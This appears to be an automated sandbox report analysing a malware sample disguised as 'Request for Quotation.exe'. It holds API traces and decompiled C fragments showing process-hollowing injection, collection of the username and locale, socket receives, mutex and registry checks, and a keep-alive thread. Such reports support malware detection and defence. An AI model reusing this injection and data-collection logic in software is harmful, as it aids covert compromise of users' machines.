                                                                                • GetModuleHandleA.KERNEL32(ntdll.dll,NtUnmapViewOfSection,?,00000000,73BCF560), ref: 0040F23A
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0040F241
                                                                                • CreateProcessW.KERNELBASE ref: 0040F294
                                                                                • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004,?,00000000,73BCF560), ref: 0040F2AC
                                                                                • GetThreadContext.KERNELBASE(?,00000000,?,00000000,73BCF560), ref: 0040F2C1
                                                                                • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000,?,00000000,73BCF560), ref: 0040F2E3
                                                                                • NtUnmapViewOfSection.NTDLL(?,?,?,00000000,73BCF560), ref: 0040F2FC
                                                                                • VirtualAllocEx.KERNELBASE(?,?,?,00003000,00000040,?,00000000,73BCF560), ref: 0040F30E
                                                                                • WriteProcessMemory.KERNELBASE(?,00000000,?,?,00000000,?,00000000,73BCF560), ref: 0040F330
                                                                                • WriteProcessMemory.KERNELBASE(?,?,?,?,00000000,?,00000000,73BCF560), ref: 0040F371
                                                                                • WriteProcessMemory.KERNELBASE(?,?,?,00000004,00000000,?,00000000,73BCF560), ref: 0040F392
                                                                                • SetThreadContext.KERNELBASE(?,?,?,00000000,73BCF560), ref: 0040F3AB
                                                                                • ResumeThread.KERNELBASE(?,?,00000000,73BCF560), ref: 0040F3B8
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.903195414.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.903223606.000000000041D000.00000040.00000001.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Process$Memory$ThreadWrite$AllocContextVirtual$AddressCreateH_prologHandleModuleProcReadResumeSectionUnmapView
                                                                                • String ID: NtUnmapViewOfSection$ntdll.dll
                                                                                • API String ID: 2881453444-1050664331
                                                                                • Opcode ID: 312b707a27dd8bcb1a4e909d494afcf009e2eee7a57a0b06384939ffbc38e31b
                                                                                • Instruction ID: 14082434b540fb9a952e0d1072ae94245c422bc39d8110babfce67740ad62d51
                                                                                • Opcode Fuzzy Hash: 312b707a27dd8bcb1a4e909d494afcf009e2eee7a57a0b06384939ffbc38e31b
                                                                                • Instruction Fuzzy Hash: 0E513A71A00204EFDB219F64CC85FAABBB9FF84710F20407AE914EB2A1D775E815CB58
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 37%
                                                                                			E00402580(void* __ecx, intOrPtr _a4, intOrPtr _a8, char _a11) {
                                                                                				struct _SYSTEMTIME _v20;
                                                                                				char _v36;
                                                                                				void* _v52;
                                                                                				char* _t25;
                                                                                				char* _t26;
                                                                                				intOrPtr _t35;
                                                                                				void* _t37;
                                                                                
                                                                                				_t37 = __ecx;
                                                                                				if( *((intOrPtr*)(__ecx + 0x38)) != 0) {
                                                                                					__eflags = 0;
                                                                                					return 0;
                                                                                				}
                                                                                				_t35 = _a4;
                                                                                				if(_a8 != 0) {
                                                                                					__eflags =  *0x41bcac; // 0x0
                                                                                					if(__eflags != 0) {
                                                                                						GetLocalTime( &_v20);
                                                                                						_t25 =  &_a11;
                                                                                						__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z("%02i:%02i:%02i:%03i [INFO] ", _t25, "KeepAlive Enabled! Timeout: %i seconds\n", _v20.wHour & 0x0000ffff, _v20.wMinute & 0x0000ffff, _v20.wSecond & 0x0000ffff, _v20.wMilliseconds & 0x0000ffff, _t35);
                                                                                						_t26 =  &_v36;
                                                                                						L00414170();
                                                                                						__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ(_t26, _t25);
                                                                                						printf(_t26);
                                                                                						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                                                                						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                                                                					}
                                                                                				} else {
                                                                                					 *((char*)(__ecx + 0x44)) = 1;
                                                                                				}
                                                                                				 *((char*)(_t37 + 0x38)) = 1;
                                                                                				 *((intOrPtr*)(_t37 + 0x3c)) = _t35;
                                                                                				CreateThread(0, 0, E004027A2, _t37, 0, 0); // executed
                                                                                				return 1;
                                                                                			}











                                                                                APIs
                                                                                • GetLocalTime.KERNEL32(?,00000001,0041BE70,0041B310,?,?,?,?,?,?,?,?,?,0040CAF3,0000000A,00000000), ref: 004025B0
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(%02i:%02i:%02i:%03i [INFO] ,?,KeepAlive Enabled! Timeout: %i seconds,0000000A,?,00000000,?,0000000A), ref: 004025DC
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,0040CAF3,0000000A,00000000), ref: 004025E7
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,0040CAF3,0000000A,00000000), ref: 004025F1
                                                                                • printf.MSVCRT ref: 004025F8
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402604
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040260D
                                                                                • CreateThread.KERNELBASE(00000000,00000000,004027A2,0041BE70,00000000,00000000), ref: 00402624
                                                                                Strings
                                                                                • KeepAlive Enabled! Timeout: %i seconds, xrefs: 004025D1
                                                                                • %02i:%02i:%02i:%03i [INFO] , xrefs: 004025D7
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.903195414.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.903223606.000000000041D000.00000040.00000001.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@?c_str@?$basic_string@CreateD@1@@D@2@@0@Hstd@@LocalThreadTimeV10@V?$basic_string@printf
                                                                                • String ID: %02i:%02i:%02i:%03i [INFO] $KeepAlive Enabled! Timeout: %i seconds
                                                                                • API String ID: 3715082883-586133315
                                                                                • Opcode ID: 51604d627dacd7a8ae8a3435ef703a50610ed316e6cde58bd2f1e49f68c81dc1
                                                                                • Instruction ID: a312a60622e34753c5bc094497f25c33392341c8bb354fb046c7070d615c6ac2
                                                                                • Opcode Fuzzy Hash: 51604d627dacd7a8ae8a3435ef703a50610ed316e6cde58bd2f1e49f68c81dc1
                                                                                • Instruction Fuzzy Hash: A611EB71800258FFCB119BE1DC48DFFBBBCAB95705B004426F842A3190D6B99944CB68
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,0041BE70,0041B310,?,?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6), ref: 0040215B
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,0041BE70,0041B310,?,?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6), ref: 00402168
                                                                                • malloc.MSVCRT ref: 00402175
                                                                                • recv.WS2_32(0041BE70,00000000,000003E8,00000000), ref: 00402186
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(00000000,00000000,?,0041BE70,0041B310,?,?,?,?,?,?,?,?,?,?,0040D1C8), ref: 0040219A
                                                                                • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6,00000001), ref: 004021A4
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6,00000001), ref: 004021AD
                                                                                • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6,00000001), ref: 004021BA
                                                                                  • Part of subcall function 0040221E: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,00000000,0041BE70,00000000), ref: 00402230
                                                                                  • Part of subcall function 0040221E: ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(0041B300,00415664), ref: 00402248
                                                                                  • Part of subcall function 0040221E: ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 00402257
                                                                                  • Part of subcall function 0040221E: ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00402261
                                                                                  • Part of subcall function 0040221E: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,00000000), ref: 0040227A
                                                                                  • Part of subcall function 0040221E: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402283
                                                                                  • Part of subcall function 0040221E: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0040D2A6,0041BEA4), ref: 004022A2
                                                                                  • Part of subcall function 0040221E: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 004022C2
                                                                                  • Part of subcall function 0040221E: ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(0041B300,00415664), ref: 004022DA
                                                                                  • Part of subcall function 0040221E: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(0040D2A6), ref: 004022EC
                                                                                  • Part of subcall function 0040221E: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,0000000F,6D195DF0), ref: 00402302
                                                                                  • Part of subcall function 0040221E: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 0040230C
                                                                                  • Part of subcall function 0040221E: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402315
                                                                                  • Part of subcall function 0040221E: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,0040D2A6), ref: 00402326
                                                                                  • Part of subcall function 0040221E: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00402330
                                                                                  • Part of subcall function 0040221E: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402339
                                                                                  • Part of subcall function 0040221E: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040234D
                                                                                • free.MSVCRT(00000000,0041BE70,0041B310,?,?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6,00000001), ref: 004021DB
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6,00000001), ref: 00402204
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6,00000001), ref: 0040220D
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.903195414.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.903223606.000000000041D000.00000040.00000001.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$V01@@$??1?$basic_string@V01@$??0?$basic_string@??4?$basic_string@$D@1@@$??9std@@?substr@?$basic_string@D@2@@0@V12@V?$basic_string@$?c_str@?$basic_string@?data@?$basic_string@?length@?$basic_string@?size@?$basic_string@Y?$basic_string@freemallocrecv
                                                                                • String ID:
                                                                                • API String ID: 2200674315-0
                                                                                • Opcode ID: d5f7163a8c610c7b444fe9c40a2ee50b7bc9fd52d4926215f829fcb5400827dc
                                                                                • Instruction ID: 77ffb52b31aa9a22c106954051cf48487ac881783d2d7cd2d5b7dec6e0024f6e
                                                                                • Opcode Fuzzy Hash: d5f7163a8c610c7b444fe9c40a2ee50b7bc9fd52d4926215f829fcb5400827dc
                                                                                • Instruction Fuzzy Hash: 0221443250050DEBCB15EBA0DE49EDEB7B9FF94745B104029E902B21D1DBB56A05CB14
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 28%
                                                                                			E00412163(intOrPtr _a4) {
                                                                                				char _v5;
                                                                                				char _v12;
                                                                                				long _v16;
                                                                                				char _v32;
                                                                                				void* _v48;
                                                                                				char _v80;
                                                                                				short _v592;
                                                                                				char* _t23;
                                                                                				char* _t25;
                                                                                
                                                                                				_v12 = 0x10;
                                                                                				 *0x41c1e8(1,  &_v80,  &_v12); // executed
                                                                                				_v16 = 0x100;
                                                                                				GetUserNameW( &_v592,  &_v16); // executed
                                                                                				_t23 =  &_v5;
                                                                                				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z("/", _t23,  &_v592);
                                                                                				_t25 =  &_v32;
                                                                                				L0041416A();
                                                                                				L00414146();
                                                                                				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ(_a4, _t25, _t25,  &_v80, _t23);
                                                                                				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                                                                				return _a4;
                                                                                			}













                                                                                APIs
                                                                                • GetUserNameW.ADVAPI32(?,?), ref: 00412195
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00416C08,?,?), ref: 004121AE
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,?,00000000), ref: 004121BD
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(00000010,00000000), ref: 004121C9
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004121D4
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004121DD
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.903195414.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.903223606.000000000041D000.00000040.00000001.sdmp

                                                                                C-Code - Quality: 37%
                                                                                			E00409E7D(void* __ecx, intOrPtr _a4) {
                                                                                				char _v5;
                                                                                				char _v8;
                                                                                
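                                                                                				// 0x800 = LOCALE_SYSTEM_DEFAULT, 0x5a = LOCALE_SISO3166CTRYNAME: reads the two-letter ISO 3166 country code (plus NUL) into a 3-byte buffer.
                                                                                				GetLocaleInfoA(0x800, 0x5a,  &_v8, 3); // executed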
                                                                                				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z( &_v8,  &_v5, __ecx);
                                                                                				return _a4;
                                                                                			}

                                                                                APIs
                                                                                • GetLocaleInfoA.KERNELBASE(00000800,0000005A,00000000,00000003,0041BFB8,?,0040CCE4,?,0041B310,0041BCD8,0041B310,00000000,0041B310,00000000,0041B310,2.7.2 Pro), ref: 00409E8E
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00000000,?,?,0040CCE4,?,0041B310,0041BCD8,0041B310,00000000,0041B310,00000000,0041B310,2.7.2 Pro,0041B310,00000000,0041B310), ref: 00409E9F
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.903195414.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.903223606.000000000041D000.00000040.00000001.sdmp

                                                                                APIs
                                                                                  • Part of subcall function 00409823: malloc.MSVCRT ref: 00409846
                                                                                  • Part of subcall function 00409823: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(00000000,00000000,?,00000000), ref: 00409872
                                                                                  • Part of subcall function 00409823: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 0040987E
                                                                                  • Part of subcall function 00409823: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00409887
                                                                                  • Part of subcall function 00409823: malloc.MSVCRT ref: 00409898
                                                                                  • Part of subcall function 00409823: free.MSVCRT(?,?,?,00000000,00408CAD,00000000), ref: 004098E3
                                                                                  • Part of subcall function 00409823: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 004098F1
                                                                                  • Part of subcall function 00409823: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004098FA
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0041BC80,?,?,00000000), ref: 00408CB7
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00408CC6
                                                                                  • Part of subcall function 004129EB: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 004129FA
                                                                                  • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A11
                                                                                  • Part of subcall function 004129EB: ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5), ref: 00412A27
                                                                                  • Part of subcall function 004129EB: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 00412A45
                                                                                  • Part of subcall function 004129EB: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A4F
                                                                                  • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A58
                                                                                  • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A6D
                                                                                  • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A7A
                                                                                  • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ACC
                                                                                  • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412AD5
                                                                                  • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ADE
                                                                                • ??0?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAE@PBDH@Z.MSVCP60(licence_code.txt,00000012,00000001,00000000), ref: 00408D31
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000034), ref: 00408D42
                                                                                • ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z.MSVCP60(?,00000000), ref: 00408D50
                                                                                • ?close@?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP60 ref: 00408D5E
                                                                                • ??_D?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP60 ref: 00408D6A
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00408D73
                                                                                • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000003,00000000), ref: 00408D8C
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(004140D8,Software\,00000000,0000000E,00415774), ref: 00408DB4
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,0000000E,00415774), ref: 00408DC1
                                                                                • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,0000000E,00415774), ref: 00408DD1
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,0000000E,00415774), ref: 00408DDA
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,0000000E,00415774), ref: 00408DE3
                                                                                • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(00000032,00000000,?,?,?,?,0000000E,00415774), ref: 00408DF5
                                                                                • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(00000033,00000000,?,?,?,?,0000000E,00415774), ref: 00408E11
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00416524,004140D8,?,?,?,?,0000000E,00415774), ref: 00408E37
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00416524,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00408E56
                                                                                • OpenMutexA.KERNEL32 ref: 00408E80
                                                                                • WaitForSingleObject.KERNEL32(00000000,0000EA60,?,?,?,?,0000000E,00415774), ref: 00408E93
                                                                                • CloseHandle.KERNEL32(004140D8,?,?,?,?,0000000E,00415774), ref: 00408E9C
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(Inj,?,?,?,?,?,0000000E,00415774), ref: 00408EAD
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(Inj,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00408ECC
                                                                                • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,0000000E,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00408EEF
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00408EFA
                                                                                • CreateMutexA.KERNELBASE(00000000,00000001,00000000,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00408F04
                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00408F0A
                                                                                • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Request for Quotation.exe,00000104,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00408F2F
                                                                                • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00408F61
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00408F6A
                                                                                • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60( (32 bit),?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00408F89
                                                                                • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0000002E,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00408FAF
                                                                                • ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI@Z.MSVCP60(00415F98,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E), ref: 00408FD4
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(origmsc,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00408FF2
                                                                                  • Part of subcall function 0040B47F: RegOpenKeyExA.ADVAPI32(00000000,00000000,00000000,00020019,00000000,80000001,?,00407A4E,80000001,00000000), ref: 0040B495
                                                                                  • Part of subcall function 0040B47F: RegQueryValueExA.ADVAPI32(00000000,80000001,00000000,00000000,00000000,00000000,0041BA38,?,00407A4E,80000001,00000000), ref: 0040B4AA
                                                                                  • Part of subcall function 0040B47F: RegCloseKey.ADVAPI32(00000000,?,00407A4E,80000001,00000000), ref: 0040B4B5
                                                                                • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000027,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 0040901A
                                                                                • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,0000000B,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E), ref: 00409044
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 0040904D
                                                                                • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000004,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 0040905E
                                                                                • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000005,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00409079
                                                                                • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000008,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00409094
                                                                                • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000003,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004090AF
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000030,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004090D4
                                                                                • wcslen.MSVCRT ref: 004090DB
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004090E7
